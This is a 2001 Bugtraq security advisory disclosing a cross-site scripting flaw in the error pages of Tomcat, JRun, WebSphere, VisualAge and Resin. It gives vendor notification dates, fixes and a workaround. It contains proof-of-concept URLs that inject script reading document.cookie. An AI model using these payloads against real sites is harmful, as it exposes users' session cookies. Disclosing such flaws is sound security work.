Bugtraq mailing list archives
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
From: "TAKAGI, Hiromitsu" <takagi () etl go jp>
Date: Mon, 02 Jul 2001 20:31:00 +0900
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability ========================================================================= Affected products: ================= Tomcat 3.2.1, 3.2.2-beta, 4.0-beta <http://jakarta.apache.org/tomcat/> JRun 3.0 <http://www.allaire.com/products/jrun/index.cfm> WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional <http://www-4.ibm.com/software/webservers/> Resin <http://www.caucho.com/products/resin/> Not affected: ============ Unknown Problem: ======= Accessing the following URLs, the JavaScript code will be executed in the browser on the server's domain. Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp JRun 3.0: http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml WebSphere 3.5 FP2: http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT> WebSphere 3.02: http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp VisualAge for Java 3.5 Professional: http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT> Resin 1.2.2: http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp These pages produce output like this: ================================================= Error 404 An error has occurred while processing request: http://WebSphere/webapp/examples/****** Message: File not found: //****** StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //****** at javax.servlet.ServletException.<init>(ServletException.java:107) at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31) at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20) at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97) ... ================================================= ******: The JavaScript code is executed here. This vulnerability is quite similar to "IIS cross-site scripting vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000. <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp> Impact: ====== For the detail about cross-site scripting, see the following pages. <http://www.cert.org/advisories/CA-2000-02.html> <http://www.microsoft.com/TechNet/security/crssite.asp> <http://www.apache.org/info/css-security/> Vendor status: ============= Tomcat: ====== Notified: 16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-code () apache org 17 Mar 2001 18:55:45 +0900, tomcat-dev () jakarta apache org Response: 17 Mar 2001 20:07:42 -0000 Fix: 30 Mar 2001, Tomcat 4.0-beta-2 (maybe) 11 May 2001, Tomcat 3.2.2-beta-5 (maybe) Announcement: <http://jakarta.apache.org/tomcat/news.html> Sun Microsystems does not publish Tomcat vulnerabilities. <http://java.sun.com/products/jsp/tomcat/> <http://java.sun.com/sfaq/chronology.html> JRun: ==== Notified: 13 Mar 2001 23:11:54 +0900, secure () allaire com Response: 13 Mar 2001 09:43:49 -0500 14 Mar 2001 09:05:03 -0500 Fix: 28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available. Announcement: <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full> Macromedia Product Security Bulletin (MPSB01-06) JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability (a.k.a. JavaScript code execution vulnerability) WebSphere: ========= Notified: 20 Mar 2001 08:13:30 +0900, *******@us.ibm.com Response: 22 Mar 2001 09:14:01 -0500 23 Mar 2001 00:02:58 +0900 Fix: PQ47386V302x (?) <http://www-4.ibm.com/software/webservers/appserv/efix.html> Announcement: <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb> (in Japanese) Resin: ===== Notified: 16 Mar 2001 02:26:47 +0900, bugs () caucho com, resin () caucho com Response: None Fix: Unknown Announcement: Unknown http://www.caucho.com/products/resin/changes.xtp Workaround: ========== Customize error pages. -- Hiromitsu Takagi, Ph.D. National Institute of Advanced Industrial Science and Technology, Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan http://www.etl.go.jp/~takagi/
Current thread:
- Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability TAKAGI, Hiromitsu (Jul 02)